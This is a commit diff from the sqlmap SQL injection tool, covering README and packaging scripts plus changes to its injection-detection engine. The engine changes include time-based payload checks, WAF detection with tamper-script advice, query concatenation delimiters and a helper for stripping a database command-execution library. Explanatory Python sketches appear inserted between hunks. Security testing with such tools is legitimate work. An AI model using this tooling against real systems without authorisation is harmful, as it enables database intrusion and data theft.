Compare commits

..

1 Commit

Author: Miroslav Stampar
SHA1: 4af65f6c41
Message: Preparing for #1250
Date: 2016-08-02 00:25:01 +02:00
79 changed files with 3217 additions and 5537 deletions

View File

@@ -60,7 +60,6 @@ Translations
* [French](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-fr-FR.md)
* [Greek](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-gr-GR.md)
* [Indonesian](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-id-ID.md)
* [Italian](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-it-IT.md)
* [Japanese](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-ja-JP.md)
* [Portuguese](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-pt-BR.md)
* [Spanish](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-es-MX.md)

View File

@@ -1,53 +0,0 @@
# sqlmap
[![Build Status](https://api.travis-ci.org/sqlmapproject/sqlmap.svg?branch=master)](https://api.travis-ci.org/sqlmapproject/sqlmap) [![Python 2.6|2.7](https://img.shields.io/badge/python-2.6|2.7-yellow.svg)](https://www.python.org/) [![License](https://img.shields.io/badge/license-GPLv2-red.svg)](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/doc/COPYING) [![Twitter](https://img.shields.io/badge/twitter-@sqlmap-blue.svg)](https://twitter.com/sqlmap)
sqlmap is an open source penetration testing tool. Its goal is to automate the process of detecting and exploiting SQL injection vulnerabilities in order to take over database servers. It comes with a powerful detection engine, many niche features for even the most experienced penetration tester, and a broad range of switches ranging from database fingerprinting and data fetching to accessing the underlying file system and executing commands on the operating system via out-of-band connections.
Screenshot
----
![Screenshot](https://raw.github.com/wiki/sqlmapproject/sqlmap/images/sqlmap_screenshot.png)
On the wiki you can visit the [collection of screenshots](https://github.com/sqlmapproject/sqlmap/wiki/Screenshots) demonstrating some of the program's features.
Installation
----
You can download the latest tarball by clicking [here](https://github.com/sqlmapproject/sqlmap/tarball/master) or the latest zipball by clicking [here](https://github.com/sqlmapproject/sqlmap/zipball/master).
Preferably, though, you should download sqlmap by cloning the [Git](https://github.com/sqlmapproject/sqlmap) repository:
git clone https://github.com/sqlmapproject/sqlmap.git sqlmap-dev
sqlmap works out of the box with [Python](http://www.python.org/download/) versions **2.6.x** and **2.7.x** on any platform.
Usage
----
For a list of basic options and switches:
python sqlmap.py -h
For a list of all options and switches:
python sqlmap.py -hh
You can find a sample run [here](https://asciinema.org/a/46601).
For an overview of sqlmap's capabilities, a list of its features, and a description of all its options and switches, together with a large number of examples, please consult the [user's manual](https://github.com/sqlmapproject/sqlmap/wiki) (available only in English).
Links
----
* Homepage: http://sqlmap.org
* Download: [.tar.gz](https://github.com/sqlmapproject/sqlmap/tarball/master) or [.zip](https://github.com/sqlmapproject/sqlmap/zipball/master)
* Commits RSS feed: https://github.com/sqlmapproject/sqlmap/commits/master.atom
* Issue tracker: https://github.com/sqlmapproject/sqlmap/issues
* User's manual: https://github.com/sqlmapproject/sqlmap/wiki
* Frequently Asked Questions (FAQ): https://github.com/sqlmapproject/sqlmap/wiki/FAQ
* Mailing list subscription: https://lists.sourceforge.net/lists/listinfo/sqlmap-users
* Mailing list RSS feed: http://rss.gmane.org/messages/complete/gmane.comp.security.sqlmap
* Mailing list archive: http://news.gmane.org/gmane.comp.security.sqlmap
* Twitter: [@sqlmap](https://twitter.com/sqlmap)
* Demos: [http://www.youtube.com/user/inquisb/videos](http://www.youtube.com/user/inquisb/videos)
* Screenshot: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots

View File

@@ -23,7 +23,7 @@ HEX_ENCODED_CHAR_REGEX = r"(?P<result>\\x[0-9A-Fa-f]{2})"
SAFE_ENCODE_SLASH_REPLACEMENTS = "\t\n\r\x0b\x0c"
# Characters that don't need to be safe encoded
SAFE_CHARS = "".join(filter(lambda _: _ not in SAFE_ENCODE_SLASH_REPLACEMENTS, string.printable.replace('\\', '')))
SAFE_CHARS = "".join(filter(lambda x: x not in SAFE_ENCODE_SLASH_REPLACEMENTS, string.printable.replace('\\', '')))
# Prefix used for hex encoded values
HEX_ENCODED_PREFIX = r"\x"
@@ -47,7 +47,7 @@ def safecharencode(value):
retVal = value
if isinstance(value, basestring):
if any([_ not in SAFE_CHARS for _ in value]):
if any(_ not in SAFE_CHARS for _ in value):
retVal = retVal.replace(HEX_ENCODED_PREFIX, HEX_ENCODED_PREFIX_MARKER)
retVal = retVal.replace('\\', SLASH_MARKER)
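A minimal standalone sketch (simplified names, not sqlmap's actual safecharencode() module) of the list-to-generator change in the hunk above: any() fed a generator expression short-circuits at the first character that needs encoding, instead of materializing a full list first.

    import string

    # Characters that do not need to be slash-encoded (mirrors the constants in the hunk above)
    SAFE_ENCODE_SLASH_REPLACEMENTS = "\t\n\r\x0b\x0c"
    SAFE_CHARS = "".join(c for c in string.printable.replace('\\', '') if c not in SAFE_ENCODE_SLASH_REPLACEMENTS)

    def needs_encoding(value):
        # any() with a generator stops at the first unsafe character,
        # while any([...]) would build the whole list before checking
        return any(c not in SAFE_CHARS for c in value)

    print(needs_encoding("plain text"))      # False
    print(needs_encoding("tab\tseparated"))  # True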

View File

@@ -8,16 +8,14 @@ FULLPATH=${SCRIPTPATH%/*}/$SETTINGS
if [ -f $FULLPATH ]
then
LINE=$(grep -o ${FULLPATH} -e 'VERSION = "[0-9.]*"')
declare -a LINE
LINE=$(grep -o ${FULLPATH} -e 'VERSION = "[0-9.]*"');
declare -a LINE;
NEW_TAG=$(python -c "import re, sys, time; version = re.search('\"([0-9.]*)\"', sys.argv[1]).group(1); _ = version.split('.'); print '.'.join(_[:-1]) if len(_) == 4 and _[-1] == '0' else ''" "$LINE")
if [ -n "$NEW_TAG" ]
then
git commit -am "Automatic monthly tagging"
echo "Creating new tag ${NEW_TAG}"
git tag $NEW_TAG
echo "Creating new tag ${NEW_TAG}";
git tag $NEW_TAG;
git push origin $NEW_TAG
echo "Going to push PyPI package"
/bin/bash ${SCRIPTPATH%/*}/pypi.sh
fi
fi
fi;
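A hedged Python sketch (illustrative function name) of what the NEW_TAG one-liner in the hunk above computes, assuming a settings line of the form VERSION = "x.y.z.n": only four-part versions ending in '.0' produce a tag, with the trailing '.0' dropped.

    import re

    def monthly_tag(settings_line):
        # Tag only four-part versions ending in ".0", e.g. 'VERSION = "1.0.8.0"' -> "1.0.8";
        # anything else yields an empty string (i.e. no tag is created)
        version = re.search(r'"([0-9.]*)"', settings_line).group(1)
        parts = version.split('.')
        return '.'.join(parts[:-1]) if len(parts) == 4 and parts[-1] == '0' else ''

    print(monthly_tag('VERSION = "1.0.8.0"'))  # 1.0.8
    print(monthly_tag('VERSION = "1.0.8.2"'))  # (empty string - interim dev release, no tag)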

View File

@@ -10,21 +10,20 @@ PROJECT_FULLPATH=${SCRIPTPATH%/*}/$PROJECT
SETTINGS_FULLPATH=${SCRIPTPATH%/*}/$SETTINGS
CHECKSUM_FULLPATH=${SCRIPTPATH%/*}/$CHECKSUM
truncate -s 0 "$CHECKSUM_FULLPATH"
cd $PROJECT_FULLPATH && for i in $(find . -name "*.py" -o -name "*.xml" -o -iname "*_" | sort); do git ls-files $i --error-unmatch &>/dev/null && md5sum $i | sed 's/\.\///' >> "$CHECKSUM_FULLPATH"; git add "$CHECKSUM_FULLPATH"; done
if [ -f $SETTINGS_FULLPATH ]
then
LINE=$(grep -o ${SETTINGS_FULLPATH} -e 'VERSION = "[0-9.]*"')
declare -a LINE
LINE=$(grep -o ${SETTINGS_FULLPATH} -e 'VERSION = "[0-9.]*"');
declare -a LINE;
INCREMENTED=$(python -c "import re, sys, time; version = re.search('\"([0-9.]*)\"', sys.argv[1]).group(1); _ = version.split('.'); _.append(0) if len(_) < 3 else _; _[-1] = str(int(_[-1]) + 1); month = str(time.gmtime().tm_mon); _[-1] = '0' if _[-2] != month else _[-1]; _[-2] = month; print sys.argv[1].replace(version, '.'.join(_))" "$LINE")
if [ -n "$INCREMENTED" ]
then
sed -i "s/${LINE}/${INCREMENTED}/" $SETTINGS_FULLPATH
echo "Updated ${INCREMENTED} in ${SETTINGS_FULLPATH}"
sed "s/${LINE}/${INCREMENTED}/" $SETTINGS_FULLPATH > $SETTINGS_FULLPATH.tmp && mv $SETTINGS_FULLPATH.tmp $SETTINGS_FULLPATH
echo "Updated ${INCREMENTED} in ${SETTINGS_FULLPATH}";
else
echo "Something went wrong in VERSION increment"
exit 1
fi
git add "$SETTINGS_FULLPATH"
fi
truncate -s 0 "$CHECKSUM_FULLPATH"
cd $PROJECT_FULLPATH && for i in $(find . -name "*.py" -o -name "*.xml" -o -iname "*_" | sort); do git ls-files $i --error-unmatch &>/dev/null && md5sum $i | stdbuf -i0 -o0 -e0 sed 's/\.\///' >> "$CHECKSUM_FULLPATH"; git add "$CHECKSUM_FULLPATH"; done
fi;
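Similarly, a standalone sketch (illustrative helper, not the script's own code) of the INCREMENTED one-liner in the hunk above: the monthly commit counter is bumped, and reset to 0 whenever the GMT month component changes.

    import re
    import time

    def bump_version(settings_line):
        version = re.search(r'"([0-9.]*)"', settings_line).group(1)
        parts = version.split('.')
        if len(parts) < 3:
            parts.append('0')
        parts[-1] = str(int(parts[-1]) + 1)   # bump the monthly commit counter
        month = str(time.gmtime().tm_mon)
        if parts[-2] != month:
            parts[-1] = '0'                   # new month: counter starts over
        parts[-2] = month
        return settings_line.replace(version, '.'.join(parts))

    # e.g. when run in August: 'VERSION = "1.0.8.2"' -> 'VERSION = "1.0.8.3"'
    print(bump_version('VERSION = "1.0.8.2"'))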

View File

@@ -1,9 +1,6 @@
#!/bin/bash
declare -x SCRIPTPATH="${0}"
SETTINGS="${SCRIPTPATH%/*}/../../lib/core/settings.py"
VERSION=$(cat $SETTINGS | grep -E "^VERSION =" | cut -d '"' -f 2 | cut -d '.' -f 1-3)
TYPE=pip
VERSION=1.0.8
TMP_DIR=/tmp/pypi
mkdir $TMP_DIR
cd $TMP_DIR
@@ -25,21 +22,10 @@ setup(
author_email='bernardo@sqlmap.org, miroslav@sqlmap.org',
url='https://sqlmap.org',
download_url='https://github.com/sqlmapproject/sqlmap/archive/$VERSION.zip',
license='GNU General Public License v2 (GPLv2)',
license='GPLv2',
packages=find_packages(),
include_package_data=True,
zip_safe=False,
# https://pypi.python.org/pypi?%3Aaction=list_classifiers
classifiers=[
'Development Status :: 5 - Production/Stable',
'License :: OSI Approved :: GNU General Public License v2 (GPLv2)',
'Natural Language :: English',
'Operating System :: OS Independent',
'Programming Language :: Python',
'Environment :: Console',
'Topic :: Database',
'Topic :: Security',
],
entry_points={
'console_scripts': [
'sqlmap = sqlmap.sqlmap:main',
@@ -62,116 +48,9 @@ See the file 'doc/COPYING' for copying permission
import os
import sys
sys.dont_write_bytecode = True
sys.path.insert(0, os.path.dirname(os.path.abspath(__file__)))
EOF
cat > README.rst << "EOF"
sqlmap
======
|Build Status| |Python 2.6|2.7| |License| |Twitter|
sqlmap is an open source penetration testing tool that automates the
process of detecting and exploiting SQL injection flaws and taking over
of database servers. It comes with a powerful detection engine, many
niche features for the ultimate penetration tester and a broad range of
switches lasting from database fingerprinting, over data fetching from
the database, to accessing the underlying file system and executing
commands on the operating system via out-of-band connections.
Screenshots
-----------
.. figure:: https://raw.github.com/wiki/sqlmapproject/sqlmap/images/sqlmap_screenshot.png
:alt: Screenshot
You can visit the `collection of
screenshots <https://github.com/sqlmapproject/sqlmap/wiki/Screenshots>`__
demonstrating some of features on the wiki.
Installation
------------
You can use pip to install and/or upgrade the sqlmap to latest (monthly) tagged version with: ::
pip install --upgrade sqlmap
Alternatively, you can download the latest tarball by clicking
`here <https://github.com/sqlmapproject/sqlmap/tarball/master>`__ or
latest zipball by clicking
`here <https://github.com/sqlmapproject/sqlmap/zipball/master>`__.
If you prefer fetching daily updates, you can download sqlmap by cloning the
`Git <https://github.com/sqlmapproject/sqlmap>`__ repository:
::
git clone https://github.com/sqlmapproject/sqlmap.git sqlmap-dev
sqlmap works out of the box with
`Python <http://www.python.org/download/>`__ version **2.6.x** and
**2.7.x** on any platform.
Usage
-----
To get a list of basic options and switches use:
::
python sqlmap.py -h
To get a list of all options and switches use:
::
python sqlmap.py -hh
You can find a sample run `here <https://asciinema.org/a/46601>`__. To
get an overview of sqlmap capabilities, list of supported features and
description of all options and switches, along with examples, you are
advised to consult the `user's
manual <https://github.com/sqlmapproject/sqlmap/wiki>`__.
Links
-----
- Homepage: http://sqlmap.org
- Download:
`.tar.gz <https://github.com/sqlmapproject/sqlmap/tarball/master>`__
or `.zip <https://github.com/sqlmapproject/sqlmap/zipball/master>`__
- Commits RSS feed:
https://github.com/sqlmapproject/sqlmap/commits/master.atom
- Issue tracker: https://github.com/sqlmapproject/sqlmap/issues
- User's manual: https://github.com/sqlmapproject/sqlmap/wiki
- Frequently Asked Questions (FAQ):
https://github.com/sqlmapproject/sqlmap/wiki/FAQ
- Mailing list subscription:
https://lists.sourceforge.net/lists/listinfo/sqlmap-users
- Mailing list RSS feed:
http://rss.gmane.org/messages/complete/gmane.comp.security.sqlmap
- Mailing list archive:
http://news.gmane.org/gmane.comp.security.sqlmap
- Twitter: [@sqlmap](https://twitter.com/sqlmap)
- Demos: http://www.youtube.com/user/inquisb/videos
- Screenshots: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots
.. |Build Status| image:: https://api.travis-ci.org/sqlmapproject/sqlmap.svg?branch=master
:target: https://api.travis-ci.org/sqlmapproject/sqlmap
.. |Python 2.6|2.7| image:: https://img.shields.io/badge/python-2.6|2.7-yellow.svg
:target: https://www.python.org/
.. |License| image:: https://img.shields.io/badge/license-GPLv2-red.svg
:target: https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/doc/COPYING
.. |Twitter| image:: https://img.shields.io/badge/twitter-@sqlmap-blue.svg
:target: https://twitter.com/sqlmap
.. pandoc --from=markdown --to=rst --output=README.rst sqlmap/README.md
.. http://rst.ninjs.org/
EOF
sed -i "s/^VERSION =.*/VERSION = \"$VERSION\"/g" sqlmap/lib/core/settings.py
sed -i "s/^TYPE =.*/TYPE = \"$TYPE\"/g" sqlmap/lib/core/settings.py
sed -i "s/.*lib\/core\/settings\.py/`md5sum sqlmap/lib/core/settings.py | cut -d ' ' -f 1` lib\/core\/settings\.py/g" sqlmap/txt/checksum.md5
for file in $(find sqlmap -type f | grep -v -E "\.(git|yml)"); do echo include $file >> MANIFEST.in; done
python setup.py sdist
python setup.py sdist upload
rm -rf $TMP_DIR
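A loose Python counterpart (illustrative only, hashing the in-memory text rather than the file as md5sum does) of the sed calls near the end of the hunk above: the packaged settings.py gets its VERSION and TYPE pinned, and the matching checksum.md5 line is refreshed.

    import hashlib
    import re

    def repack_settings(settings_text, checksum_text, version):
        settings_text = re.sub(r'(?m)^VERSION =.*', 'VERSION = "%s"' % version, settings_text)
        settings_text = re.sub(r'(?m)^TYPE =.*', 'TYPE = "pip"', settings_text)
        digest = hashlib.md5(settings_text.encode("utf8")).hexdigest()
        checksum_text = re.sub(r'(?m)^.*lib/core/settings\.py$',
                               '%s  lib/core/settings.py' % digest, checksum_text)
        return settings_text, checksum_text

    s, c = repack_settings('VERSION = "1.0.8.2"\nTYPE = "dev"\n',
                           'deadbeef  lib/core/settings.py\n', "1.0.8")
    print(s.strip())
    print(c.strip())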

View File

@@ -1,15 +0,0 @@
#!/bin/bash
# References: http://www.thegeekstuff.com/2012/09/strip-command-examples/
# http://www.muppetlabs.com/~breadbox/software/elfkickers.html
# https://ptspts.blogspot.hr/2013/12/how-to-make-smaller-c-and-c-binaries.html
# For example:
# python ../../../../../extra/cloak/cloak.py -d -i lib_postgresqludf_sys.so_
# ../../../../../extra/shutils/strip.sh lib_postgresqludf_sys.so
# python ../../../../../extra/cloak/cloak.py -i lib_postgresqludf_sys.so
# rm lib_postgresqludf_sys.so
strip -S --strip-unneeded --remove-section=.note.gnu.gold-version --remove-section=.comment --remove-section=.note --remove-section=.note.gnu.build-id --remove-section=.note.ABI-tag $*
sstrip $*

View File

@@ -74,7 +74,8 @@ def action():
if conf.getPasswordHashes:
try:
conf.dumper.userSettings("database management system users password hashes", conf.dbmsHandler.getPasswordHashes(), "password hash", CONTENT_TYPE.PASSWORDS)
conf.dumper.userSettings("database management system users password hashes",
conf.dbmsHandler.getPasswordHashes(), "password hash", CONTENT_TYPE.PASSWORDS)
except SqlmapNoneDataException, ex:
logger.critical(ex)
except:
@@ -82,7 +83,8 @@ def action():
if conf.getPrivileges:
try:
conf.dumper.userSettings("database management system users privileges", conf.dbmsHandler.getPrivileges(), "privilege", CONTENT_TYPE.PRIVILEGES)
conf.dumper.userSettings("database management system users privileges",
conf.dbmsHandler.getPrivileges(), "privilege", CONTENT_TYPE.PRIVILEGES)
except SqlmapNoneDataException, ex:
logger.critical(ex)
except:
@@ -90,7 +92,8 @@ def action():
if conf.getRoles:
try:
conf.dumper.userSettings("database management system users roles", conf.dbmsHandler.getRoles(), "role", CONTENT_TYPE.ROLES)
conf.dumper.userSettings("database management system users roles",
conf.dbmsHandler.getRoles(), "role", CONTENT_TYPE.ROLES)
except SqlmapNoneDataException, ex:
logger.critical(ex)
except:

View File

@@ -74,7 +74,6 @@ from lib.core.settings import IDS_WAF_CHECK_RATIO
from lib.core.settings import IDS_WAF_CHECK_TIMEOUT
from lib.core.settings import MAX_DIFFLIB_SEQUENCE_LENGTH
from lib.core.settings import NON_SQLI_CHECK_PREFIX_SUFFIX_LENGTH
from lib.core.settings import SLEEP_TIME_MARKER
from lib.core.settings import SUHOSIN_MAX_VALUE_LENGTH
from lib.core.settings import SUPPORTED_DBMS
from lib.core.settings import URI_HTTP_HEADER
@@ -95,13 +94,6 @@ def checkSqlInjection(place, parameter, value):
# Localized thread data needed for some methods
threadData = getCurrentThreadData()
# Favoring non-string specific boundaries in case of digit-like parameter values
if value.isdigit():
kb.cache.intBoundaries = kb.cache.intBoundaries or sorted(copy.deepcopy(conf.boundaries), key=lambda boundary: any(_ in (boundary.prefix or "") or _ in (boundary.suffix or "") for _ in ('"', '\'')))
boundaries = kb.cache.intBoundaries
else:
boundaries = conf.boundaries
# Set the flag for SQL injection test mode
kb.testMode = True
@@ -157,7 +149,6 @@ def checkSqlInjection(place, parameter, value):
kb.testType = stype = test.stype
clause = test.clause
unionExtended = False
trueCode, falseCode = None, None
if stype == PAYLOAD.TECHNIQUE.UNION:
configUnion(test.request.char)
@@ -320,6 +311,12 @@ def checkSqlInjection(place, parameter, value):
comment = agent.getComment(test.request) if len(conf.boundaries) > 1 else None
fstPayload = agent.cleanupPayload(test.request.payload, origValue=value if place not in (PLACE.URI, PLACE.CUSTOM_POST, PLACE.CUSTOM_HEADER) else None)
# Favoring non-string specific boundaries in case of digit-like parameter values
if value.isdigit():
boundaries = sorted(copy.deepcopy(conf.boundaries), key=lambda x: any(_ in (x.prefix or "") or _ in (x.suffix or "") for _ in ('"', '\'')))
else:
boundaries = conf.boundaries
for boundary in boundaries:
injectable = False
@@ -522,7 +519,7 @@ def checkSqlInjection(place, parameter, value):
if not any((conf.string, conf.notString, conf.code)):
infoMsg = "%s parameter '%s' appears to be '%s' injectable " % (paramType, parameter, title)
singleTimeLogMessage(infoMsg)
logger.info(infoMsg)
# In case of error-based SQL injection
elif method == PAYLOAD.METHOD.GREP:
@@ -558,15 +555,8 @@ def checkSqlInjection(place, parameter, value):
elif method == PAYLOAD.METHOD.TIME:
# Perform the test's request
trueResult = Request.queryPage(reqPayload, place, timeBasedCompare=True, raise404=False)
trueCode = threadData.lastCode
if trueResult:
# Extra validation step (e.g. to check for DROP protection mechanisms)
if SLEEP_TIME_MARKER in reqPayload:
falseResult = Request.queryPage(reqPayload.replace(SLEEP_TIME_MARKER, "0"), place, timeBasedCompare=True, raise404=False)
if falseResult:
continue
# Confirm test's results
trueResult = Request.queryPage(reqPayload, place, timeBasedCompare=True, raise404=False)
@@ -677,8 +667,6 @@ def checkSqlInjection(place, parameter, value):
injection.data[stype].comment = comment
injection.data[stype].templatePayload = templatePayload
injection.data[stype].matchRatio = kb.matchRatio
injection.data[stype].trueCode = trueCode
injection.data[stype].falseCode = falseCode
injection.conf.textOnly = conf.textOnly
injection.conf.titles = conf.titles
@@ -1329,7 +1317,7 @@ def identifyWaf():
kb.redirectChoice = popValue()
return page or "", headers or {}, code
retVal = []
retVal = False
for function, product in kb.wafFunctions:
try:
@@ -1343,20 +1331,18 @@ def identifyWaf():
found = False
if found:
errMsg = "WAF/IDS/IPS identified as '%s'" % product
logger.critical(errMsg)
retVal.append(product)
retVal = product
break
if retVal:
errMsg = "WAF/IDS/IPS identified as '%s'. Please " % retVal
errMsg += "consider usage of tamper scripts (option '--tamper')"
logger.critical(errMsg)
message = "are you sure that you want to "
message += "continue with further target testing? [y/N] "
output = readInput(message, default="N")
if not conf.tamper:
warnMsg = "please consider usage of tamper scripts (option '--tamper')"
singleTimeWarnMessage(warnMsg)
if output and output[0] not in ("Y", "y"):
raise SqlmapUserQuitException
else:
@@ -1388,7 +1374,7 @@ def checkNullConnection():
if not page and HTTP_HEADER.CONTENT_LENGTH in (headers or {}):
kb.nullConnection = NULLCONNECTION.HEAD
infoMsg = "NULL connection is supported with HEAD method (Content-Length)"
infoMsg = "NULL connection is supported with HEAD header"
logger.info(infoMsg)
else:
page, headers, _ = Request.getPage(auxHeaders={HTTP_HEADER.RANGE: "bytes=-1"})
@@ -1396,7 +1382,7 @@ def checkNullConnection():
if page and len(page) == 1 and HTTP_HEADER.CONTENT_RANGE in (headers or {}):
kb.nullConnection = NULLCONNECTION.RANGE
infoMsg = "NULL connection is supported with GET method (Range)"
infoMsg = "NULL connection is supported with GET header "
infoMsg += "'%s'" % kb.nullConnection
logger.info(infoMsg)
else:
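A self-contained sketch (Boundary here is a made-up stand-in for sqlmap's conf.boundaries entries) of the boundary re-ordering logic appearing in the checkSqlInjection() hunk above: for digit-like parameter values, boundaries whose prefix/suffix contain no quote characters sort first, because a False sort key orders before True.

    import copy

    class Boundary(object):
        def __init__(self, prefix, suffix):
            self.prefix, self.suffix = prefix, suffix
        def __repr__(self):
            return "Boundary(%r, %r)" % (self.prefix, self.suffix)

    boundaries = [Boundary("'", "-- "), Boundary("", ""), Boundary('")', "-- ")]
    value = "42"

    if value.isdigit():
        # quote-free (non-string) boundaries are tried first
        ordered = sorted(copy.deepcopy(boundaries),
                         key=lambda b: any(q in (b.prefix or "") or q in (b.suffix or "")
                                           for q in ('"', "'")))
    else:
        ordered = boundaries

    print(ordered)  # the quote-free boundary comes first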

View File

@@ -545,7 +545,7 @@ def start():
kb.testedParams.add(paramKey)
if not injectable:
warnMsg = "%s parameter '%s' does not seem to be " % (paramType, parameter)
warnMsg = "%s parameter '%s' is not " % (paramType, parameter)
warnMsg += "injectable"
logger.warn(warnMsg)

View File

@@ -22,7 +22,6 @@ from lib.core.settings import MAXDB_ALIASES
from lib.core.settings import SYBASE_ALIASES
from lib.core.settings import DB2_ALIASES
from lib.core.settings import HSQLDB_ALIASES
from lib.core.settings import INFORMIX_ALIASES
from lib.utils.sqlalchemy import SQLAlchemy
from plugins.dbms.mssqlserver import MSSQLServerMap
@@ -47,8 +46,6 @@ from plugins.dbms.db2 import DB2Map
from plugins.dbms.db2.connector import Connector as DB2Conn
from plugins.dbms.hsqldb import HSQLDBMap
from plugins.dbms.hsqldb.connector import Connector as HSQLDBConn
from plugins.dbms.informix import InformixMap
from plugins.dbms.informix.connector import Connector as InformixConn
def setHandler():
"""
@@ -68,7 +65,6 @@ def setHandler():
(DBMS.SYBASE, SYBASE_ALIASES, SybaseMap, SybaseConn),
(DBMS.DB2, DB2_ALIASES, DB2Map, DB2Conn),
(DBMS.HSQLDB, HSQLDB_ALIASES, HSQLDBMap, HSQLDBConn),
(DBMS.INFORMIX, INFORMIX_ALIASES, InformixMap, InformixConn),
]
_ = max(_ if (Backend.getIdentifiedDbms() or "").lower() in _[1] else None for _ in items)

View File

@@ -43,7 +43,6 @@ from lib.core.settings import GENERIC_SQL_COMMENT
from lib.core.settings import NULL
from lib.core.settings import PAYLOAD_DELIMITER
from lib.core.settings import REPLACEMENT_MARKER
from lib.core.settings import SLEEP_TIME_MARKER
from lib.core.unescaper import unescaper
class Agent(object):
@@ -344,7 +343,7 @@ class Agent(object):
"""
if payload:
payload = payload.replace(SLEEP_TIME_MARKER, str(conf.timeSec))
payload = payload.replace("[SLEEPTIME]", str(conf.timeSec))
return payload
@@ -487,7 +486,7 @@ class Agent(object):
@rtype: C{str}
"""
prefixRegex = r"(?:\s+(?:FIRST|SKIP|LIMIT(?: \d+)?)\s+\d+)*"
prefixRegex = r"(?:\s+(?:FIRST|SKIP|LIMIT \d+)\s+\d+)*"
fieldsSelectTop = re.search(r"\ASELECT\s+TOP\s+[\d]+\s+(.+?)\s+FROM", query, re.I)
fieldsSelectRownum = re.search(r"\ASELECT\s+([^()]+?),\s*ROWNUM AS LIMIT FROM", query, re.I)
fieldsSelectDistinct = re.search(r"\ASELECT%s\s+DISTINCT\((.+?)\)\s+FROM" % prefixRegex, query, re.I)
@@ -508,26 +507,26 @@ class Agent(object):
if fieldsSubstr:
fieldsToCastStr = query
elif fieldsMinMaxstr:
fieldsToCastStr = fieldsMinMaxstr.group(1)
fieldsToCastStr = fieldsMinMaxstr.groups()[0]
elif fieldsExists:
if fieldsSelect:
fieldsToCastStr = fieldsSelect.group(1)
fieldsToCastStr = fieldsSelect.groups()[0]
elif fieldsSelectTop:
fieldsToCastStr = fieldsSelectTop.group(1)
fieldsToCastStr = fieldsSelectTop.groups()[0]
elif fieldsSelectRownum:
fieldsToCastStr = fieldsSelectRownum.group(1)
fieldsToCastStr = fieldsSelectRownum.groups()[0]
elif fieldsSelectDistinct:
if Backend.getDbms() in (DBMS.HSQLDB,):
fieldsToCastStr = fieldsNoSelect
else:
fieldsToCastStr = fieldsSelectDistinct.group(1)
fieldsToCastStr = fieldsSelectDistinct.groups()[0]
elif fieldsSelectCase:
fieldsToCastStr = fieldsSelectCase.group(1)
fieldsToCastStr = fieldsSelectCase.groups()[0]
elif fieldsSelectFrom:
fieldsToCastStr = query[:unArrayizeValue(_)] if _ else query
fieldsToCastStr = re.sub(r"\ASELECT%s\s+" % prefixRegex, "", fieldsToCastStr)
elif fieldsSelect:
fieldsToCastStr = fieldsSelect.group(1)
fieldsToCastStr = fieldsSelect.groups()[0]
# Function
if re.search("\A\w+\(.*\)", fieldsToCastStr, re.I) or (fieldsSelectCase and "WHEN use" not in query) or fieldsSubstr:
@@ -668,23 +667,24 @@ class Agent(object):
concatenatedQuery = "'%s'&%s&'%s'" % (kb.chars.start, concatenatedQuery, kb.chars.stop)
else:
warnMsg = "applying generic concatenation (CONCAT)"
warnMsg = "applying generic concatenation with double pipes ('||')"
singleTimeWarnMessage(warnMsg)
if fieldsExists:
concatenatedQuery = concatenatedQuery.replace("SELECT ", "CONCAT(CONCAT('%s'," % kb.chars.start, 1)
concatenatedQuery += "),'%s')" % kb.chars.stop
concatenatedQuery = concatenatedQuery.replace("SELECT ", "'%s'||" % kb.chars.start, 1)
concatenatedQuery += "||'%s'" % kb.chars.stop
elif fieldsSelectCase:
concatenatedQuery = concatenatedQuery.replace("SELECT ", "CONCAT(CONCAT('%s'," % kb.chars.start, 1)
concatenatedQuery += "),'%s')" % kb.chars.stop
concatenatedQuery = concatenatedQuery.replace("SELECT ", "'%s'||(SELECT " % kb.chars.start, 1)
concatenatedQuery += ")||'%s'" % kb.chars.stop
elif fieldsSelectFrom:
concatenatedQuery = concatenatedQuery.replace("SELECT ", "'%s'||" % kb.chars.start, 1)
_ = unArrayizeValue(zeroDepthSearch(concatenatedQuery, " FROM "))
concatenatedQuery = "%s),'%s')%s" % (concatenatedQuery[:_].replace("SELECT ", "CONCAT(CONCAT('%s'," % kb.chars.start, 1), kb.chars.stop, concatenatedQuery[_:])
concatenatedQuery = "%s||'%s'%s" % (concatenatedQuery[:_], kb.chars.stop, concatenatedQuery[_:])
elif fieldsSelect:
concatenatedQuery = concatenatedQuery.replace("SELECT ", "CONCAT(CONCAT('%s'," % kb.chars.start, 1)
concatenatedQuery += "),'%s')" % kb.chars.stop
concatenatedQuery = concatenatedQuery.replace("SELECT ", "'%s'||" % kb.chars.start, 1)
concatenatedQuery += "||'%s'" % kb.chars.stop
elif fieldsNoSelect:
concatenatedQuery = "CONCAT(CONCAT('%s',%s),'%s')" % (kb.chars.start, concatenatedQuery, kb.chars.stop)
concatenatedQuery = "'%s'||%s||'%s'" % (kb.chars.start, concatenatedQuery, kb.chars.stop)
return concatenatedQuery
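A rough illustration (marker values made up for the example) of the two delimiting styles shown side by side in the Agent hunk above: one wraps the selected expression in nested CONCAT() calls, the other uses the double-pipe string concatenation operator.

    start, stop = "qxqzq", "qkqvq"   # stand-ins for kb.chars.start / kb.chars.stop
    field = "banner"                 # the expression whose output gets delimited

    concat_style = "CONCAT(CONCAT('%s',%s),'%s')" % (start, field, stop)
    pipes_style = "'%s'||%s||'%s'" % (start, field, stop)

    print(concat_style)  # CONCAT(CONCAT('qxqzq',banner),'qkqvq')
    print(pipes_style)   # 'qxqzq'||banner||'qkqvq'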

View File

@@ -813,6 +813,11 @@ def getAutoDirectories():
warnMsg = "unable to automatically parse any web server path"
logger.warn(warnMsg)
_ = extractRegexResult(r"//[^/]+?(?P<result>/.*)/", conf.url) # web directory
if _:
retVal.add(_)
return list(retVal)
def filePathToSafeString(filePath):
@@ -1195,7 +1200,6 @@ def setPaths(rootPath):
paths.SQLMAP_XML_PAYLOADS_PATH = os.path.join(paths.SQLMAP_XML_PATH, "payloads")
_ = os.path.join(os.path.expandvars(os.path.expanduser("~")), ".sqlmap")
paths.SQLMAP_HOME_PATH = _
